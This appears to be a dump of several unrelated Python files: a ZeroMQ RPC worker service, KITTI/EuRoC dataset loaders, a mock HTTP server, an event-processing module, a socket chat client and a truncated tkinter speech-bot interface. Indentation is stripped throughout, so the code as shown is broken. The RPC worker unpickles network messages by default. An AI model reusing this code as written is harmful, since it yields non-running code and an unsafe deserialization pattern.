def __init__(self, conf_file=None, **kwargs):
module_options = {'method_module', 'event_init_module'}
function_options = {'startup_function'}
original_argv, sys.argv = sys.argv, [i for i in sys.argv if i.strip('-').split('=')[0] in module_options]
self._load_options(conf_file, **{i: kwargs[i] for i in kwargs if i in module_options})
modules = {getattr(options, i) for i in module_options if getattr(options, i)}
for module in modules:
__import__(module)
function_modules = {getattr(options, i).rsplit('.', 1)[0] for i in function_options if getattr(options, i)}
for module in function_modules:
__import__(module)
sys.argv = original_argv
#clear root logger handlers to prevent duplicate logging if user has specified a log file
super(TotoWorkerService, self).__init__(conf_file, **kwargs)
#clear method_module references so we can fully reload with new options
for module in modules:
for i in (m for m in sys.modules.keys() if m.startswith(module)):
del sys.modules[i]
for module in function_modules:
for i in (m for m in sys.modules.keys() if m.startswith(module)):
del sys.modules[i]
#prevent the reloaded module from re-defining options
define, tornado.options.define = tornado.options.define, lambda *args, **kwargs: None
self.__event_init = options.event_init_module and __import__(options.event_init_module) or None
self.__method_module = options.method_module and __import__(options.method_module) or None
tornado.options.define = define
def prepare(self):
self.balancer = None
if options.worker_bind_address:
self.balancer = ProcessDevice(zmq.QUEUE, zmq.ROUTER, zmq.DEALER)
self.balancer.daemon = True
self.balancer.bind_in(options.worker_bind_address)
self.balancer.bind_out(options.worker_socket_address)
self.balancer.setsockopt_in(zmq.IDENTITY, 'ROUTER')
self.balancer.setsockopt_out(zmq.IDENTITY, 'DEALER')
self.balancer.start()
if options.daemon:
with open(pid_path(0), 'wb') as f:
f.write(str(self.balancer.launcher.pid))
count = options.processes if options.processes >= 0 else cpu_count()
if count == 0:
print 'Starting load balancer. Listening on "%s". Routing to "%s"' % (options.worker_bind_address, options.worker_socket_address)
else:
print "Starting %s worker process%s. %s." % (count, count > 1 and 'es' or '', options.worker_bind_address and ('Listening on "%s"' % options.worker_bind_address) or ('Connecting to "%s"' % options.worker_socket_address))
def main_loop(self):
db_connection = configured_connection()
if options.remote_event_receivers:
from toto.events import EventManager
event_manager = EventManager.instance()
if options.remote_instances:
for address in options.remote_event_receivers.split(','):
event_manager.register_server(address)
init_module = self.__event_init
if init_module:
init_module.invoke(event_manager)
serialization = options.serialization_module and __import__(options.serialization_module) or pickle
compression = options.compression_module and __import__(options.compression_module)
worker = TotoWorker(self.__method_module, options.worker_socket_address, db_connection, compression, serialization)
if options.startup_function:
startup_path = options.startup_function.rsplit('.')
__import__(startup_path[0]).__dict__[startup_path[1]](worker=worker, db_connection=db_connection)
worker.start()
def send_worker_command(self, command):
if options.control_socket_address:
socket = zmq.Context().socket(zmq.PUB)
socket.bind(options.control_socket_address)
time.sleep(1)
socket.send_string('command %s' % command)
print "Sent command: %s" % options.command
def run(self):
if options.command:
self.send_worker_command(options.command)
return
super(TotoWorkerService, self).run()
class TotoWorker():
'''The worker is responsible for processing all RPC calls. An instance
will be initialized for each incoming request.
You can set the module to use for method delegation via the ``method_module`` parameter.
Methods are modules that contain an invoke function::
def invoke(handler, parameters)
The request worker instance will be passed as the first parameter to the invoke function and
provides access to the server's database connection. Request parameters will be passed as the
second argument to the invoke function.
Any value returned from a method invocation will be sent to the caller, closing the
message->response cycle. If you only need to let the caller know that the task has begun, you
should decorate your ``invoke`` function with ``@toto.invocation.asynchronous`` to send a
response before processing begins.
'''
def __init__(self, method_module, socket_address, db_connection, compression=None, serialization=None):
self.context = zmq.Context()
self.socket_address = socket_address
self.method_module = method_module
self.db_connection = db_connection
self.db = db_connection and db_connection.db or None
self.status = 'Initialized'
self.running = False
self.compress = compression and compression.compress or (lambda x: x)
self.decompress = compression and compression.decompress or (lambda x: x)
self.loads = serialization and serialization.loads or pickle.loads
self.dumps = serialization and serialization.dumps or pickle.dumps
if options.debug:
from traceback import format_exc
def error_info(self, e):
if not isinstance(e, TotoException):
e = TotoException(ERROR_SERVER, str(e))
logging.error('%s\n%s\n' % (e, format_exc()))
return e.__dict__
TotoWorker.error_info = error_info
def error_info(self, e):
if not isinstance(e, TotoException):
e = TotoException(ERROR_SERVER, str(e))
logging.error(str(e))
return e.__dict__
def log_status(self):
logging.info('Pid: %s status: %s' % (os.getpid(), self.status))
def __monitor_control(self, address=options.control_socket_address):
def monitor():
socket = self.context.socket(zmq.SUB)
socket.setsockopt(zmq.SUBSCRIBE, 'command')
socket.connect(address)
while self.running:
try:
command = socket.recv().split(' ', 1)[1]
logging.info("Received command: %s" % command)
if command == 'shutdown':
self.running = False
self.context.term()
return
elif command == 'status':
self.log_status()
except Exception as e:
self.error_info(e)
if address:
thread = Thread(target=monitor)
thread.daemon = True
thread.start()
def start(self):
self.running = True
self.__monitor_control()
socket = self.context.socket(zmq.REP)
socket.connect(self.socket_address)
pending_reply = False
while self.running:
try:
self.status = 'Listening'
message = socket.recv_multipart()
pending_reply = True
message_id = message[0]
data = self.loads(self.decompress(message[1]))
logging.info('Received Task %s: %s' % (message_id, data['method']))
method = self.method_module
for i in data['method'].split('.'):
method = getattr(method, i)
if hasattr(method.invoke, 'asynchronous'):
socket.send_multipart((message_id,))
pending_reply = False
self.status = 'Working'
method.invoke(self, data['parameters'])
else:
self.status = 'Working'
response = method.invoke(self, data['parameters'])
socket.send_multipart((message_id, self.compress(self.dumps(response))))
pending_reply = False
except Exception as e:
if pending_reply:
socket.send_multipart((message_id, self.compress(self.dumps({'error': self.error_info(e)}))))
self.status = 'Finished'
self.log_status()
|
dataset.py | import numpy as np
import cv2
import os
import time
from collections import defaultdict, namedtuple
from threading import Thread, Lock
from multiprocessing import Process, Queue
class ImageReader(object):
def __init__(self, ids, timestamps, cam=None):
self.ids = ids
self.timestamps = timestamps
self.cam = cam
self.cache = dict()
self.idx = 0
self.ahead = 10 # 10 images ahead of current index
self.waiting = 1.5 # waiting time
self.preload_thread = Thread(target=self.preload)
self.thread_started = False
def read(self, path):
img = cv2.imread(path, -1)
if self.cam is None:
return img
else:
return self.cam.rectify(img)
def preload(self):
idx = self.idx
t = float('inf')
while True:
if time.time() - t > self.waiting:
return
if self.idx == idx:
time.sleep(1e-2)
continue
for i in range(self.idx, self.idx + self.ahead):
if i not in self.cache and i < len(self.ids):
self.cache[i] = self.read(self.ids[i])
if self.idx + self.ahead > len(self.ids):
return
idx = self.idx
t = time.time()
def __len__(self):
return len(self.ids)
def __getitem__(self, idx):
self.idx = idx
# if not self.thread_started:
# self.thread_started = True
# self.preload_thread.start()
if idx in self.cache:
img = self.cache[idx]
del self.cache[idx]
else:
img = self.read(self.ids[idx])
return img
def __iter__(self):
for i, timestamp in enumerate(self.timestamps):
yield timestamp, self[i]
@property
def dtype(self):
return self[0].dtype
@property
def shape(self):
return self[0].shape
class KITTIOdometry(object): # without lidar
'''
path example: 'path/to/your/KITTI odometry dataset/sequences/00'
'''
def __init__(self, path):
Cam = namedtuple('cam', 'fx fy cx cy width height baseline')
cam00_02 = Cam(718.856, 718.856, 607.1928, 185.2157, 1241, 376, 0.5371657)
cam03 = Cam(721.5377, 721.5377, 609.5593, 172.854, 1241, 376, 0.53715)
cam04_12 = Cam(707.0912, 707.0912, 601.8873, 183.1104, 1241, 376, 0.53715)
path = os.path.expanduser(path)
timestamps = np.loadtxt(os.path.join(path, 'times.txt'))
self.left = ImageReader(self.listdir(os.path.join(path, 'image_2')),
timestamps)
self.right = ImageReader(self.listdir(os.path.join(path, 'image_3')),
timestamps)
assert len(self.left) == len(self.right)
self.timestamps = self.left.timestamps
sequence = int(path.strip(os.path.sep).split(os.path.sep)[-1])
if sequence < 3:
self.cam = cam00_02
elif sequence == 3:
self.cam = cam03
elif sequence < 13:
self.cam = cam04_12
def sort(self, xs):
return sorted(xs, key=lambda x:float(x[:-4]))
def listdir(self, dir):
files = [_ for _ in os.listdir(dir) if _.endswith('.png')]
return [os.path.join(dir, _) for _ in self.sort(files)]
def __len__(self):
return len(self.left)
class Camera(object):
def __init__(self,
width, height,
intrinsic_matrix,
undistort_rectify=False,
extrinsic_matrix=None,
distortion_coeffs=None,
rectification_matrix=None,
projection_matrix=None):
self.width = width
self.height = height
self.intrinsic_matrix = intrinsic_matrix
self.extrinsic_matrix = extrinsic_matrix
self.distortion_coeffs = distortion_coeffs
self.rectification_matrix = rectification_matrix
self.projection_matrix = projection_matrix
self.undistort_rectify = undistort_rectify
self.fx = intrinsic_matrix[0, 0]
self.fy = intrinsic_matrix[1, 1]
self.cx = intrinsic_matrix[0, 2]
self.cy = intrinsic_matrix[1, 2]
if undistort_rectify:
self.remap = cv2.initUndistortRectifyMap(
cameraMatrix=self.intrinsic_matrix,
distCoeffs=self.distortion_coeffs,
R=self.rectification_matrix,
newCameraMatrix=self.projection_matrix,
size=(width, height),
m1type=cv2.CV_8U)
else:
self.remap = None
def rectify(self, img):
if self.remap is None:
return img
else:
return cv2.remap(img, *self.remap, cv2.INTER_LINEAR)
class StereoCamera(object):
def __init__(self, left_cam, right_cam):
self.left_cam = left_cam
self.right_cam = right_cam
self.width = left_cam.width
self.height = left_cam.height
self.intrinsic_matrix = left_cam.intrinsic_matrix
self.extrinsic_matrix = left_cam.extrinsic_matrix
self.fx = left_cam.fx
self.fy = left_cam.fy
self.cx = left_cam.cx
self.cy = left_cam.cy
self.baseline = abs(right_cam.projection_matrix[0, 3] /
right_cam.projection_matrix[0, 0])
self.focal_baseline = self.fx * self.baseline
class EuRoCDataset(object): # Stereo + IMU
'''
path example: 'path/to/your/EuRoC Mav dataset/MH_01_easy'
'''
def __init__(self, path, rectify=True):
self.left_cam = Camera(
width=752, height=480,
intrinsic_matrix = np.array([
[458.654, 0.000000, 367.215],
[0.000000, 457.296, 248.375],
[0.000000, 0.000000, 1.000000]]),
undistort_rectify=rectify,
distortion_coeffs = np.array(
[-0.28340811, 0.07395907, 0.00019359, 1.76187114e-05, 0.000000]),
rectification_matrix = np.array([
[0.999966347530033, -0.001422739138722922, 0.008079580483432283],
[0.001365741834644127, 0.9999741760894847, 0.007055629199258132],
[-0.008089410156878961, -0.007044357138835809, 0.9999424675829176]]),
projection_matrix = np.array([
[435.2046959714599, 0, 367.4517211914062, 0],
[0, 435.2046959714599, 252.2008514404297, 0],
[0., 0, 1, 0]]),
extrinsic_matrix = np.array([
[0.0148655429818, -0.999880929698, 0.00414029679422, -0.0216401454975],
[0.999557249008, 0.0149672133247, 0.025715529948, -0.064676986768],
[-0.0257744366974, 0.00375618835797, 0.999660727178, 0.00981073058949],
[0.0, 0.0, 0.0, 1.0]])
)
self.right_cam = Camera(
width=752, height=480,
intrinsic_matrix = np.array([
[457.587, 0.000000, 379.999],
[0.000000, 456.134, 255.238],
[0.000000, 0.000000, 1.000000]]),
undistort_rectify=rectify,
distortion_coeffs = np.array(
[-0.28368365, 0.07451284, -0.00010473, -3.555907e-05, 0.0]),
rectification_matrix = np.array([
[0.9999633526194376, -0.003625811871560086, 0.007755443660172947],
[0.003680398547259526, 0.9999684752771629, -0.007035845251224894],
[-0.007729688520722713, 0.007064130529506649, 0.999945173484644]]),
projection_matrix = np.array([
[435.2046959714599, 0, 367.4517211914062, -47.90639384423901],
[0, 435.2046959714599, 252.2008514404297, 0],
[0, 0, 1, 0]]),
extrinsic_matrix = np.array([
[0.0125552670891, -0.999755099723, 0.0182237714554, -0.0198435579556],
[0.999598781151, 0.0130119051815, 0.0251588363115, 0.0453689425024],
[-0.0253898008918, 0.0179005838253, 0.999517347078, 0.00786212447038],
[0.0, 0.0, 0.0, 1.0]])
)
path = os.path.expanduser(path)
self.left = ImageReader(
*self.list_imgs(os.path.join(path, 'mav0', 'cam0', 'data')),
self.left_cam)
self.right = ImageReader(
*self.list_imgs(os.path.join(path, 'mav0', 'cam1', 'data')),
self.right_cam)
assert len(self.left) == len(self.right)
self.timestamps = self.left.timestamps
self.cam = StereoCamera(self.left_cam, self.right_cam)
def list_imgs(self, dir):
xs = [_ for _ in os.listdir(dir) if _.endswith('.png')]
xs = sorted(xs, key=lambda x:float(x[:-4]))
timestamps = [float(_[:-4]) * 1e-9 for _ in xs]
return [os.path.join(dir, _) for _ in xs], timestamps
def __len__(self):
return len(self.left)
|
httpserver.py | import socket
import sys
import threading
import time
import signal
import random
class MockHTTPServer:
"""
A mock HTTP server that always responds with HTTP/200 OK, but also counts
the total and maximum number of connections that were established.
"""
def __init__(self, backlogSize=1000, port=0, fakeLattency=0, responseCode=200,
content="OK!"):
# Create a TCP/IP socket
self.backlogSize = backlogSize
self.port = port
self.fakeLattency = fakeLattency
self.responseCode = responseCode
self.setContent(content)
# List of active connections
self.running = False
self.thread = None
self.connections = []
self.connectionsLock = threading.Lock()
# Counters
self.maxConcurrentConnections = 0
self.totalConnections = 0
self.totalRequests = 0
def setContent(self, content):
"""
Change the response content
"""
if type(content) is str:
self.content = content.encode('utf-8')
else:
self.content = content
def start(self):
"""
Start the main thread
"""
# Start a TCP socket and get the actual port used
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.bind(('127.0.0.1', self.port))
self.port = self.sock.getsockname()[1]
# Listen for incoming connections
self.sock.listen(self.backlogSize)
# Reset counters
self.maxConcurrentConnections = 0
self.totalConnections = 0
# Start main thread
self.running = True
self.thread = threading.Thread(target=self._mainThread)
self.thread.start()
def stop(self):
"""
Stop all active connections and join main thread
"""
self.running = False
with self.connectionsLock:
for conn in self.connections:
try:
conn.shutdown(socket.SHUT_WR)
except Exception as e:
pass
try:
conn.close()
except Exception as e:
pass
self.connections = []
# Close socket and join thread
self.sock.close()
self.thread.join()
# GC the socket and the thread
self.thread = None
self.sock = None
def _mainThread(self):
"""
The main listening thread that spawns a new thread for each connection
"""
while self.running:
try:
connection, address = self.sock.accept()
except ConnectionAbortedError:
break
# Start a new thread for each connection
self.totalConnections += 1
t = threading.Thread(
target=self._connectionnThread,
args=(connection, address),
daemon=True)
t.start()
def _connectionnThread(self, connection, address):
with self.connectionsLock:
self.connections.append(connection)
if len(self.connections) > self.maxConcurrentConnections:
self.maxConcurrentConnections = len(self.connections)
while self.running:
try:
data = connection.recv(1024)
except OSError as e:
with self.connectionsLock:
try:
i = self.connections.index(connection)
del self.connections[i]
except ValueError:
pass
break
if data:
# Count valid requests
if b'HTTP/1' in data:
self.totalRequests += 1
# Respond with some mocked data
time.sleep(random.random() * self.fakeLattency)
connection.send(b"HTTP/1.1 " + str(self.responseCode).encode('utf-8') +
b" OK\r\nContent-Type: text/plain\r\nContent-Length: " +
str(len(self.content)).encode('utf-8') + b"\r\n\r\n" + self.content)
else:
with self.connectionsLock:
try:
i = self.connections.index(connection)
del self.connections[i]
except ValueError:
pass
break
|
escape_stream.py | """
Welcome to the
Event Synchronous Categorisation And Processing Environment,
a high level, object oriented module which abstracts event processing to
high level objects that can get updated from live data.
"""
from threading import Thread
import time
from .es_wrappers import EventHandler_SFEL
import numpy as np
from . import tools
import operator
from . import plots
import copy
import matplotlib.pyplot as plt
from collections import deque
from multiprocessing import Process
from .testStream import createStream
class TestStream:
def __init__(self):
self.test_stream_running = None
def start(self):
if self.test_stream_running:
print("Stream already running")
return
self.test_stream_running = Process(target=createStream)
self.test_stream_running.start()
test_stream = TestStream()
def initEscDataInstances():
eventWorker = EventWorker()
sources = eventWorker._eventHandler.getSourceIDs()
out = dict()
for sourceId in sources:
out[sourceId] = EscData(source=EventSource(sourceId, eventWorker))
eventWorker.startEventLoop()
return tools.Dict2obj(out)
class Scan:
def __init__(self, parameters=None, values=[], precision=dict(), sortValues=True):
"""
parameters are EscDatainstances, that all should have a name.
"""
self._parameters = parameters
if self._parameters is None:
self._parameterNames = None
self._precision = None
self._values = [None]
else:
self._parameterNames = [tp.name for tp in self._parameters]
self._applyPrecision(precision)
self._values = values
self._sortValues = sortValues
def _applyPrecision(self, precision=dict()):
if isinstance(precision, np.ndarray):
self._precision = precision
else:
self._precision = np.zeros(len(self._parameters))
for key in precision.keys():
if key in self._parameterNames:
self._precision[self._parameterNames.index(key)] = precision[key]
def _roundParameters(self, parValues):
pv = np.asarray(parValues)
ind = self._precision.nonzero()[0]
if len(ind) > 0:
pv[ind] = np.round(pv[ind] / self._precision[ind]) * self._precision[ind]
return tuple(pv)
def _isValid(self):
if self._parameters is None:
return True
parValues = [tp._getEventData() for tp in self._parameters]
return not np.isnan(parValues).any()
def _append(self):
"""Appends scan parameter values in case they don't exist already.
returns a boolean "is to append" and the index of the data"""
if self._parameters is None:
return False, 0
parValues = [tp._getEventData() for tp in self._parameters]
if np.isnan(parValues).any():
return None, None
parValues = self._roundParameters(parValues)
if parValues in self._values:
return False, self._values.index(parValues)
else:
self._values.append(parValues)
return True, len(self._values) - 1
def keys(self):
return self._parameterNames
def copy(self):
return Scan(
parameters=self._parameters, values=self._values, precision=self._precision
)
def __len__(self):
return len(self._values)
def __getitem__(self, item):
try:
if type(item) is slice or type(item) is int:
return np.asarray(self._values).T[item]
elif type(item) is str:
return np.asarray(self._values).T[self._parameterNames.index(item)]
except:
return []
class EscData:
def __init__(self, source=None, dataManager=None, scan=Scan()):
# source is an object of different types,
# e.g. event Collector,
# processing object,
# indexed file source
self._source = source
self.unit = self._source.unit
self.name = self._source.name
self.scan = scan
if dataManager is None:
dataManager = DataManager(scan=scan)
self._dataManager = dataManager
self.data = self._dataManager.data
self.eventIds = self._dataManager.eventIds
self._accPassively = False
self._isesc = True
self._lastEventId = None
def shape(self):
return self._dataManager._get_shape()
def lens(self):
return self._dataManager.lens()
def _getEventDataRaw(self):
# eventId = self._source.eventWorker.event.getEventId()
# if eventId == self._lastEventId:
# return
return self._source.getEventData()
def __len__(self):
return len(self._dataManager)
def _getEventData(self):
if self.scan._isValid():
return self._getEventDataRaw()
else:
return None
def _appendEventData(self):
eventId = self._source.eventWorker.event.getEventId()
if eventId == self._lastEventId:
return
data = self._getEventData()
if not data is None:
self._dataManager.append(data, eventId)
self._lastEventId = eventId
def _get_shape(self):
pass
def _update(self):
self._appendEventData()
def accumulate(self, do_accumulate=None):
if do_accumulate is None:
print("Toggling accumulation to", ["on", "off"][self._is_accumulating()])
do_accumulate = not self._is_accumulating()
if do_accumulate:
self._source.eventWorker.eventCallbacks.append(self._appendEventData)
else:
try:
i = self._source.eventWorker.eventCallbacks.index(self._appendEventData)
self._source.eventWorker.eventCallbacks.pop(i)
except:
pass
def _is_accumulating(self):
return self._appendEventData in self._source.eventWorker.eventCallbacks
def digitize(self, target, edges, side="left"):
pass
def categorizeBy(self, escdata_category, binning_def, side="left"):
"""
Create new EscData instance of same data source, but catagorized
according to another EscData instance (escdata_category),
binned according to binning_def, which can be
a) a float providing a bin precision (the minimum binsize for continuous
data). Will not predefine bins but create them according to
incoming data
b) a list of binning edges used e.g. by np.digitize.
"""
if type(binning_def) is float:
s = Scan(
parameters=[escdata_category],
precision={escdata_category.name: binning_def},
)
elif np.iterable(binning_def):
s = digitizeScan(escdata_category, binning_def)
return EscData(source=self._source, scan=s)
def digitize(self, binning_def, side="left"):
"""
Create new EscData instance of same data source, but digitized
according to bins of the own data, could be
a) a float providing a bin precision (the minimum binsize for continuous
data). Will not predefine bins but create them according to
incoming data
b) a list of binning edges used e.g. by np.digitize.
"""
if type(binning_def) is float:
s = Scan(parameters=[self], precision={self.name: binning_def})
elif np.iterable(binning_def):
s = digitizeScan(self, binning_def)
return EscData(source=self._source, scan=s)
def mean(self):
return [np.mean(td, axis=0) for td in self.data]
def std(self):
return [np.std(td, axis=0) for td in self.data]
def median(self):
return [np.median(td, axis=0) for td in self.data]
def centerPerc(self, perc=68.3):
pervals = [50 - perc / 2.0, 50 + perc / 2.0]
return [np.percentile(td, pervals, axis=0) for td in self.data]
def plotHist(self, update=0.5, axes=None):
self.accumulate(1)
if axes is None:
fig = plt.figure("%s histogram" % self.name)
axes = fig.gca()
self._histPlot = plots.HistPlot(self)
self._histPlot.plot()
if update:
self._histPlot.updateContinuously(interval=update)
def plotMed(self, update=0.5, axes=None):
self.accumulate(1)
if axes is None:
fig = plt.figure("%s median" % self.name)
axes = fig.gca()
self._medPlot = plots.Plot(self)
self._medPlot.plot()
if update:
self._medPlot.updateContinuously(interval=update)
def plotCorr(self, xVar, Npoints=300, update=0.5, axes=None):
self.accumulate(1)
xVar.accumulate(1)
if axes is None:
fig = plt.figure("%s %s Correlation" % (self.name, xVar.name))
axes = fig.gca()
self._corrPlot = plots.PlotCorrelation(xVar, self, Nlast=Npoints)
self._corrPlot.plot()
if update:
self._corrPlot.updateContinuously(interval=update)
# class SortedData:
# def __init__(self,data,sorter,issorted):
# self.data = data
# self.sorter = sorter
# self.issorted = issorted
# def __getitem__(self,item):
# self.data.__getitem(self.sorter().)
class DataManager:
def __init__(self, data=None, eventIds=None, maxlen=1000, scan=Scan()):
self.scan = scan
if data is None and eventIds is None:
self._data = [deque(maxlen=maxlen) for n in range(len(scan._values))]
self._eventIds = [deque(maxlen=maxlen) for n in range(len(scan._values))]
else:
self._data = data
self._eventIds = eventIds
self._lastEventId = None
def append(self, data, eventId, index=None):
if eventId == self._lastEventId:
return
self._lastEventId = eventId
if index is None:
doappend, index = self.scan._append()
if not doappend is None:
if doappend:
self._data.append([])
self._eventIds.append([])
self._data[index].append(data)
self._eventIds[index].append(eventId)
def _getDataShape(self):
lens = self.lens()
if max(lens) > 0:
return np.shape(self.data[lens.index(max(lens))][0])
else:
return None
def __len__(self):
return len(self.data)
def lens(self):
le = [
len(te) if len(te) == len(td) else print("Trouble in step %d" % n)
for n, (te, td) in enumerate(zip(self._eventIds, self._data))
]
return le
def _get_data(self):
return self._data
def _get_eventIds(self):
return self._eventIds
data = property(_get_data)
eventIds = property(_get_eventIds)
class EventSource:
def __init__(self, sourceId, eventWorker, unit="a.u."):
self.name = sourceId
self.unit = unit
self.eventWorker = eventWorker
def getEventData(self):
return self.eventWorker.event.getFromSource(self.name)
class ProcSource:
def __init__(self, procObj, eventWorker, returnIndex=0, name=None, unit="a.u."):
self.name = name
self.unit = unit
self.eventWorker = eventWorker
self.procObj = procObj
self.returnIndex = returnIndex
def getEventData(self):
if self.procObj.getEventData():
self.procObj.updateChildren(self)
return self.procObj.ret_values[self.returnIndex]
class FileSource:
"""Place holder for a file source with an indexed file,
i.e. the functionality of ixppy"""
pass
class EventWorker:
def __init__(self, eventHandler=EventHandler_SFEL()):
self._eventHandler = eventHandler
self.eventCallbacks = []
self.sources = []
self.event = None
self.initSourceFunc = eventHandler.registerSource
self.eventGenerator = eventHandler.eventGenerator
self._lastTime = time.time()
self.runningFrequency = 0.0
def registerSource(self, sourceID):
self.initSourceFunc(sourceID)
def eventLoop(self):
for event in self.eventGenerator():
self.event = event
ttime = time.time()
self.runningFrequency = 1 / (ttime - self._lastTime)
self._lastTime = ttime
for ecb in self.eventCallbacks:
ecb()
# event has getFromSource(sourcename) method
if not self.running:
break
def startEventLoop(self):
self.loopThread = Thread(target=self.eventLoop)
self.loopThread.setDaemon(True)
self.running = True
self.loopThread.start()
def stopEventLoop(self):
self.running = False
class ProcObj:
def __init__(
self,
func,
args=[],
kwargs=dict(),
returns_is_esc=[True],
returns_names=None,
returns_units=None,
objects=[],
scan=None,
scanIndex=None,
):
self.func = func
self.args = args
self.kwargs = kwargs
self.objects = objects
self.returns_is_esc = returns_is_esc
self.returns_names = returns_names
self.returns_units = returns_units
self.args_is_esc = [isesc(targ) for targ in args]
self.nonesc_returns = []
self.kwargs_is_esc = {name: isesc(value) for name, value in kwargs.items()}
self.scan = scan
if scan is None:
if not scanIndex is None:
self.scan = self.getEscArgs()[scanIndex].scan.copy()
else:
scan = Scan()
self.children = None
self.eventWorker = None
self._last_processed_eventId = None
self.getEventWorker()
def getEscArgs(self):
escArgs = []
for n in np.nonzero(self.args_is_esc)[0]:
escArgs.append(self.args[n])
return escArgs
def getEscKwargs(self):
escKwargs = dict()
for key, isEsc in self.kwargs_is_esc.items():
if isEsc:
escKwargs[key] = self.kwargs[key]
return escKwargs
def getEventWorker(self):
allEsc = self.getEscArgs() + list(self.getEscKwargs().values())
allEventWorkers = [te._source.eventWorker for te in allEsc]
assert all(
x == allEventWorkers[0] for x in allEventWorkers
), "Problem with eventWorkers! seems there is more than one! "
self.eventWorker = allEventWorkers[0]
def createChildren(self):
self.children = []
for returnIndex, isesc in enumerate(self.returns_is_esc):
if isesc:
if self.returns_names is None:
name = "none"
else:
name = self.returns_names[returnIndex]
if self.returns_units is None:
unit = "none"
else:
unit = self.returns_units[returnIndex]
newscan = self.scan.copy()
self.children.append(
EscData(
source=ProcSource(
self,
name=name,
unit=unit,
eventWorker=self.eventWorker,
returnIndex=returnIndex,
),
scan=newscan,
)
)
return self.children
def getEventData(self):
tid = self.eventWorker.event.getEventId()
if not self._last_processed_eventId == tid:
args = [
targ._getEventData() if aie else targ
for targ, aie in zip(self.args, self.args_is_esc)
]
kwargs = {
key: tkwarg._getEventData() if self.kwargs_is_esc[key] else tkwarg
for key, tkwarg in self.kwargs.items()
}
self._last_processed_eventId = tid
if not any(
[arg is None for arg in args] + [arg is None for arg in kwargs.values()]
):
ret_values = self.func(*args, **kwargs)
if not type(ret_values) is tuple:
ret_values = (ret_values,)
self.ret_values = ret_values
return True
else:
return False
def updateChildren(self, caller):
for child in self.children:
if not child._source is caller:
child._update()
def isesc(obj):
try:
return obj._isesc
except:
return False
def digitize(data, edges, side="left"):
data = np.atleast_1d(data)
edges = np.asarray(edges)
assert (np.diff(edges) >= 0).all(), "edges must be monotonic, increasing"
# edges = np.hstack([np.nan,np.asarray(edges),np.nan])
indices = edges.searchsorted(data, side=side)
indout = np.logical_or(indices == 0, indices == len(edges))
edgelower = np.nan * np.ones_like(data)
edgeupper = np.nan * np.ones_like(data)
edgelower[~indout] = edges[indices[~indout] - 1]
edgeupper[~indout] = edges[indices[~indout]]
bincenter = (edgeupper + edgelower) / 2.0
return np.squeeze(bincenter), np.squeeze(edgelower), np.squeeze(edgeupper)
def digitizeEsc(escdata, edges, side="left"):
po = ProcObj(
digitize,
args=[escdata, edges],
returns_is_esc=[True, True, True],
returns_names=[
"%s_bincenter" % escdata.name,
"%s_edgelower" % escdata.name,
"%s_edgeupper" % escdata.name,
],
returns_units=[escdata.unit] * 3,
scan=escdata.scan,
)
return po.createChildren()
def digitizeScan(escdata, edges, side="left"):
escdats = digitizeEsc(escdata, edges, side=side)
values = [
(sum(edges[n : n + 2]) / 2.0, edges[n], edges[n + 1])
for n in range(len(edges) - 1)
]
return Scan(escdats, values=values)
def wrapFunc_singleOutput(func, name=None, unit=None, scan=None):
if name is None:
name = "none"
if unit is None:
unit = "none"
def newFunc(*args, **kwargs):
p = ProcObj(
func,
args=args,
returns_is_esc=[True],
returns_names=[name],
returns_units=[unit],
scan=Scan(None),
)
return p.createChildren()[0]
return newFunc
def _wrapOperatorJoin(func, symbol):
def newFunc(*args):
names = [
arg.name if hasattr(arg, "name") else type(arg).__name__ for arg in args
]
return_name = (" %s " % symbol).join(names).join(["(", ")"])
units = [arg.unit if hasattr(arg, "unit") else "no unit" for arg in args]
return_unit = (" %s " % symbol).join(units).join(["(", ")"])
p = ProcObj(
func,
args=args,
returns_is_esc=[True],
returns_names=[return_name],
returns_units=[return_unit],
scan=args[0].scan,
)
return p.createChildren()[0]
return newFunc
def _wrapOperatorSingle(func, symbol):
def newFunc(*args):
name = args[0].name
return_name = ("%s %s" % (symbol, name)).join(["(", ")"])
units = [arg.unit for arg in args]
return_unit = ("%s %s" % (symbol, name)).join(units).join(["(", ")"])
p = ProcObj(
func,
args=args,
returns_is_esc=[True],
returns_names=[return_name],
returns_units=[return_unit],
scan=args[0].scan,
)
return p.createChildren()[0]
return newFunc
_operatorsJoin = [
(operator.add, "+"),
(operator.contains, "in"),
(operator.truediv, "/"),
(operator.floordiv, "//"),
(operator.and_, "&"),
(operator.xor, "^"),
(operator.or_, "|"),
(operator.pow, "**"),
(operator.is_, "is"),
(operator.is_not, "is not"),
(operator.lshift, "<<"),
(operator.mod, "%"),
(operator.mul, "*"),
(operator.rshift, ">>"),
(operator.sub, "-"),
(operator.lt, "<"),
(operator.le, "<="),
(operator.eq, "=="),
(operator.ne, "!="),
(operator.ge, ">="),
(operator.gt, ">"),
]
_operatorsSingle = [
(operator.invert, "~"),
(operator.neg, "-"),
(operator.not_, "not"),
(operator.pos, "pos"),
]
for opJoin, symbol in _operatorsJoin:
setattr(EscData, "__%s__" % opJoin.__name__, _wrapOperatorJoin(opJoin, symbol))
for opSing, symbol in _operatorsSingle:
setattr(EscData, "__%s__" % opSing.__name__, _wrapOperatorSingle(opSing, symbol))
|
client3.py | import socket
from threading import Thread
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect(('127.0.0.1', 8888))
def send_message():
while True:
sock.send(input().encode('utf-8'))
def receive_message():
while True:
data = sock.recv(1024)
print(data.decode('utf-8'))
send_thread = Thread(target=send_message)
get_thread = Thread(target=receive_message)
send_thread.start()
get_thread.start() |
interface.py | from tkinter import *
import tkinter.font as font
import threading
import speech_recognition as sr
import win32com.client
import json
import Operations.operations
import random
l=sr.Recognizer()
speaker=win32com.client.Dispatch("SAPI.SpVoice")
def homepage():
global screen1
screen1=Tk()
myFont = font.Font(size=50)
screen1.configure(bg="#93bfed")
screen1.title("Speak Bot")
screen1.geometry('1920x1080')
robo_img=PhotoImage(file=r"D:\Python_files\Python\Project\Images\robot.png")
dict_img=PhotoImage(file=r"D:\Python_files\Python\Project\Images\unnamed.png")
dict_img=dict_img.subsample(3,3)
quiz_image=PhotoImage(file=r"D:\Python_files\Python\Project\Images\quizlet_logo_large.png")
quiz_image=quiz_image.subsample(5,5)
texttospeach_img=PhotoImage(file=r"D:\Python_files\Python\Project\Images\TexttoSpeech.png")
texttospeach_img=texttospeach_img.subsample(3,3)
speachtotext_img=PhotoImage(file="D:\Python_files\Python\Project\Images\SpeechToText.png")
speachtotext_img=speachtotext_img.subsample(3,3)
